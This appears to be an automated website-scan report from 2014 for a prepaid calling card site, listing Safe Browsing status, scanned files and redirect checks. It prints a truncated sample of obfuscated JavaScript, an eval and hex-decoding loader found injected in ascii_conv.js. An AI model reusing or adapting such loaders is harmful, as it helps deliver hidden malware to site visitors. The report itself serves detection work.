Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=longdistanceprepaidcallingcards.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://longdistanceprepaidcallingcards.com/ | HTTP/1.1 200 OK Connection: close Date: Fri, 26 Dec 2014 16:17:27 GMT Accept-Ranges: bytes ETag: "e185d3-165a-4e50017267680" Server: Apache Content-Length: 5722 Content-Type: text/html Last-Modified: Wed, 28 Aug 2013 11:14:18 GMT | clean |
http://www.trueminutesonline.com/ | 200 OK Content-Length: 9603 Content-Type: text/html | clean |
http://www.trueminutesonline.com/js/site.slide.js | 200 OK Content-Length: 2164 Content-Type: application/x-javascript | clean |
http://longdistanceprepaidcallingcards.com/js/site.disable.js | 404 Not Found Content-Length: 335 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/ascii_conv.js | 200 OK Content-Length: 10139 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) znw="y";poxuoy="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[poxuoy].body)==null}()}catch(xyvpyi){ltt=function(gayzxs){gayzxs="fr"+"omCh"+gayzxs;for(sphpd=0;sphpd<znw.length;sphpd++){cxn+=String[gayzxs](eyanau(khupxd+(znw[sphpd]))-(20));}};};eyanau=(eval);khupxd="0x";ovgr=0;try{;}catch(mmroj){ovgr=1}if(!ovgr){try{++eyanau(poxuoy)["\x62o"+"d"+znw]}catch(xyvpyi){vlaj="^";}znw="34^7a^89^82^77^88^7d^83^82^34^8a^7f^7c^84^80^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^ Antivirus reports:
| ||
http://longdistanceprepaidcallingcards.com/js/site.ajax.js | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/site.bookmark.js | 404 Not Found Content-Length: 336 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/swfobject_modified.js | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/prototype.js | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/scriptaculous.js?load=effects,builder | 404 Not Found Content-Length: 336 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/lightbox.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://longdistanceprepaidcallingcards.com/js/jquery.easing.1.3.js | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://longdistanceprepaidcallingcards.com/js/jquery.nivo.slider.js | 404 Not Found Content-Length: 341 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: longdistanceprepaidcallingcards.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 16:17:27 GMT
Accept-Ranges: bytes
ETag: "e185d3-165a-4e50017267680"
Server: Apache
Content-Length: 5722
Content-Type: text/html
Last-Modified: Wed, 28 Aug 2013 11:14:18 GMT
...5722 bytes of data.
GET / HTTP/1.1
Host: longdistanceprepaidcallingcards.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 16:17:27 GMT
Accept-Ranges: bytes
ETag: "e185d3-165a-4e50017267680"
Server: Apache
Content-Length: 5722
Content-Type: text/html
Last-Modified: Wed, 28 Aug 2013 11:14:18 GMT
...5722 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: longdistanceprepaidcallingcards.com
Referer: http://www.google.com/search?q=longdistanceprepaidcallingcards.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: longdistanceprepaidcallingcards.com
Referer: http://www.google.com/search?q=longdistanceprepaidcallingcards.com
Result:
The result is similar to the first query. There are no suspicious redirects found.